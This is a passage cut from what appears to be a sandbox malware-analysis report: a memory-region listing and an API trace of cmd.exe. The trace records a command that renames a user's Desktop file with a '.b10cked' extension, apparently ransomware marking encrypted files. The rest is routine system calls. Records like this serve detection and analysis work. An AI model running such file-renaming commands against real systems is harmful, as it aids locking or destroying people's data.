(normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32919 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32920 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" 
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32921 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32922 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32923 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33080 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33081 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33082 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33083 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 33084 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 33085 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33086 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33087 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename 
= "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33088 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33089 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33090 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33091 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33092 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33093 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33094 start_va = 0x460000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 33095 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33096 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33097 
start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33098 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 33099 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33100 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33101 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 33102 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 33103 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 779 os_tid = 0xed4 [0220.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfef4 | out: lpSystemTimeAsFileTime=0x1cfef4*(dwLowDateTime=0xb81cd900, dwHighDateTime=0x1d440a9)) [0220.309] GetCurrentProcessId () returned 0xe58 [0220.309] GetCurrentThreadId () returned 0xed4 [0220.309] GetTickCount () returned 0x3d7d7 [0220.309] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfeec | out: lpPerformanceCount=0x1cfeec*=27709787306) returned 1 [0220.309] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.309] __set_app_type (_Type=0x1) [0220.309] __p__fmode () returned 0x76b331f4 [0220.309] __p__commode () returned 0x76b331fc [0220.309] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.310] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 
0 [0220.310] GetCurrentThreadId () returned 0xed4 [0220.310] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xed4) returned 0x38 [0220.310] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.310] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.310] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.310] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.310] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfe84 | out: phkResult=0x1cfe84*=0x0) returned 0x2 [0220.310] VirtualQuery (in: lpAddress=0x1cfebb, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.310] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.310] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.310] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.311] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfe54, dwLength=0x1c | out: lpBuffer=0x1cfe54*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0220.311] 
GetConsoleOutputCP () returned 0x1b5 [0220.311] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.311] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.311] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.311] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.311] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.311] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.311] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.311] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0220.312] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.312] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.312] GetEnvironmentStringsW () returned 0x2a0150* [0220.312] FreeEnvironmentStringsW (penv=0x2a0150) returned 1 [0220.312] GetEnvironmentStringsW () returned 0x2a0150* [0220.312] FreeEnvironmentStringsW (penv=0x2a0150) returned 1 [0220.312] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cedf4 | out: phkResult=0x1cedf4*=0x40) returned 0x0 [0220.312] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x0, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.312] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x1, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: 
lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x1, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x0, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x40, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x40, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x40, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.313] RegCloseKey (hKey=0x40) returned 0x0 [0220.313] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cedf4 | out: phkResult=0x1cedf4*=0x40) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x40, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x1, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x1, lpcbData=0x1cedf8*=0x1000) 
returned 0x2 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x0, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x9, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x4, lpData=0x1cee00*=0x9, lpcbData=0x1cedf8*=0x4) returned 0x0 [0220.313] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cedfc, lpData=0x1cee00, lpcbData=0x1cedf8*=0x1000 | out: lpType=0x1cedfc*=0x0, lpData=0x1cee00*=0x9, lpcbData=0x1cedf8*=0x1000) returned 0x2 [0220.313] RegCloseKey (hKey=0x40) returned 0x0 [0220.313] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.313] srand (_Seed=0x5b8863b6) [0220.313] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"" [0220.313] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav\" \"C:\\Users\\EEBsYm5\\Desktop\\Bwuwh.wav.b10cked\"" [0220.313] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.314] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2a18b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.314] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.314] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.314] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.314] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.314] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.314] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.314] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.314] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.314] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.314] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.314] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.314] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.314] GetEnvironmentStringsW () returned 0x2a22a0* [0220.315] FreeEnvironmentStringsW (penv=0x2a22a0) returned 1 [0220.315] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.315] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.315] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.315] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.315] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.315] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.315] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.315] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.315] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0220.315] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.315] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfbc0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.315] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfbc0, lpFilePart=0x1cfbbc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cfbbc*="Desktop") returned 0x18 [0220.315] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.315] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf93c | out: lpFindFileData=0x1cf93c) returned 0x29ffe0 [0220.315] FindClose (in: hFindFile=0x29ffe0 | out: hFindFile=0x29ffe0) returned 1 [0220.315] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf93c | out: lpFindFileData=0x1cf93c) returned 0x29ffe0 [0220.315] FindClose (in: hFindFile=0x29ffe0 | out: hFindFile=0x29ffe0) returned 1 [0220.316] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf93c | out: lpFindFileData=0x1cf93c) returned 0x29ffe0 [0220.316] FindClose (in: hFindFile=0x29ffe0 | out: hFindFile=0x29ffe0) returned 1 [0220.316] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.316] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.316] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.316] GetEnvironmentStringsW () returned 0x2a2ac0* [0220.316] FreeEnvironmentStringsW (penv=0x2a2ac0) returned 1 [0220.316] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.317] GetConsoleOutputCP () returned 0x1b5 [0220.317] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) 
returned 1 [0220.317] GetUserDefaultLCID () returned 0x409 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfd00, cchData=128 | out: lpLCData="0") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfd00, cchData=128 | out: lpLCData="0") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfd00, cchData=128 | out: lpLCData="1") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.317] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.318] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.318] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.319] GetConsoleTitleW (in: lpConsoleTitle=0x2908b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0220.319] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.319] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.319] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.319] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.320] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.320] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.320] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.320] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.320] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.320] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.320] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0220.322] GetConsoleTitleW (in: lpConsoleTitle=0x1cf9f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.484] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.485] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.485] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.485] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.485] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.485] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.485] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.485] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.485] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.485] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.485] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.485] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.485] _wcsicmp 
(_String1="move", _String2="MD") returned 11 [0220.485] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.485] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.485] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.485] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.485] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.485] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.485] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.485] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.485] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.485] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.485] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0220.485] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.485] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.485] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.485] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.485] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.485] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.485] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.487] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.487] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.487] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1cf7b4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1cf7ac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1cf7ac*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.487] _wcsnicmp (_String1="COPYCMD", 
_String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.487] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.488] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) 
